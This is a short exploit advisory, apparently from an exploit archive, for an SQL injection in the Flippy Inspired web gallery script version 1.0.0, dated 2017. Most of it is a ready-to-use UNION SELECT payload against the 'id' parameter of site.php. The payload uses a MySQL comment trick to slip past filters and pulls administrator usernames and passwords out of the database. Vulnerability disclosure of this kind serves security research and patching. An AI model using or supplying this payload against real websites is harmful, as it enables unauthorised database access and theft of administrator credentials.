18 lines
No EOL
737 B
Text
18 lines
No EOL
737 B
Text
# # # # #
|
||
# Exploit Title: Flippy Inspired – Web Inspiration Gallery Script v1.0.0 - SQL Injection
|
||
# Google Dork: N/A
|
||
# Date: 06.02.2017
|
||
# Vendor Homepage: https://www.flippyscripts.com/
|
||
# Software Buy: https://www.flippyscripts.com/flippy-inspired-web-inspiration-gallery-script/
|
||
# Demo: http://inspired.flippydemos.com/
|
||
# Version: 1.0.0
|
||
# Tested on: Win7 x64, Kali Linux x64
|
||
# # # # #
|
||
# Exploit Author: Ihsan Sencan
|
||
# Author Web: http://ihsan.net
|
||
# Author Mail : ihsan[beygir]ihsan[nokta]net
|
||
# # # # #
|
||
# SQL Injection/Exploit :
|
||
# http://localhost/[PATH]/site.php?id=[SQL]
|
||
# -9999+/*!50000union*/+select+concat_ws(0x3a,username,0x3a,password),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+administrator--
|
||
# # # # # |